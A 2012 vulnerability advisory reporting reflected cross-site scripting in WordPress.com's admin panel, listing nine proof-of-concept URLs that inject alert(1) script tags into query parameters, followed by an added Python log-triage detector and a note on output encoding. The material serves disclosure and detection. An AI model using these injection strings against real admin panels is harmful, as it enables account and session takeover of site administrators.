WordPress Blog Cross Site Scripting
Posted on 12 January 2012
###############################################################################################################
# Exploit Title: Wordpress Blog ( hosted by Wordpress.com ) - Admin Panel Reflected Cross-Site Scripting ( XSS )
# Script Page : http://wordpress.com
# Date: 10-01-2012
# Author : RandomStorm - http://www.randomstorm.com
#          Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista (IE9)
###############################################################################################################
# Cross-Site Scripting (XSS)
# POC:
# http://site.com//wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1
# http://site.com//wp-admin/paid-upgrades.php?id=04a60d"><script>alert(1)</script>8b5efd72d71
# http://site.com/wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1
# http://site.com/wp-admin/edit.php?7ea9d"><script>alert(1)</script>4179dee262d=1
# http://site.com/wp-admin/post-new.php?cape7739"><script>alert(1)</script>154225169bf#cap
# http://site.com/wp-admin/tools.php?36eae"><script>alert(1)</script>3ee8cbf0807=1
# http://site.com/wp-admin/post.php?post=28ce53"><script>alert(1)</script>7d542a3eb0c&action=edit
# http://site.com/wp-admin/widgets.php?1a6e1"><script>alert(1)</script>fca8623d09b=1
# http://site.com/wp-admin/import.php?b90df"><script>alert(1)</script>4f0256c6187=1
################################################################################################################
# No version ! they use a dedicated script
# Works on Internet Explorer v9
################################################################################################################
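For log triage, the request pattern in the PoC list can be matched as below. This is an added example, not part of the original advisory; the names `suspicious_parts`, `BREAKOUT` and `SAMPLES` and the regex heuristic are assumptions. It checks parameter names as well as values, because most of the PoCs place the markup in the name.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumed heuristic: a double quote followed by '>' (attribute and tag closed),
# or the start of an HTML tag, anywhere in a decoded query-string component.
BREAKOUT = re.compile(r'"\s*>|<\s*/?\s*[a-z!]', re.IGNORECASE)


def suspicious_parts(url):
    """Return [(where, decoded_text)] for each /wp-admin/ query parameter
    name or value that contains markup-breaking characters."""
    parts = urlsplit(url)  # drops the '#fragment', which never reaches the server
    if "/wp-admin/" not in parts.path:
        return []
    hits = []
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        # Inspect the name as well: most PoCs above carry the payload there.
        for where, raw in (("name", name), ("value", value)):
            text = unquote_plus(raw)
            if BREAKOUT.search(text):
                hits.append((where, text))
    return hits


# First three URLs are from the PoC list; the last two are constructed samples
# (a percent-encoded variant as it would appear in a log, and a benign request).
SAMPLES = [
    'http://site.com/wp-admin/edit.php?7ea9d"><script>alert(1)</script>4179dee262d=1',
    'http://site.com/wp-admin/post.php?post=28ce53"><script>alert(1)</script>7d542a3eb0c&action=edit',
    'http://site.com//wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1',
    "http://site.com/wp-admin/tools.php?36eae%22%3E%3Cscript%3Ealert(1)%3C/script%3E3ee8cbf0807=1",
    "http://site.com/wp-admin/index.php?page=my-comments",
]

if __name__ == "__main__":
    for url in SAMPLES:
        where = [w for w, _ in suspicious_parts(url)]
        print("ALERT" if where else "ok   ", where, url)
```

A match only flags the request for review; the fix for reflected XSS of this kind is context-appropriate output encoding wherever the request data is written back into the page.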
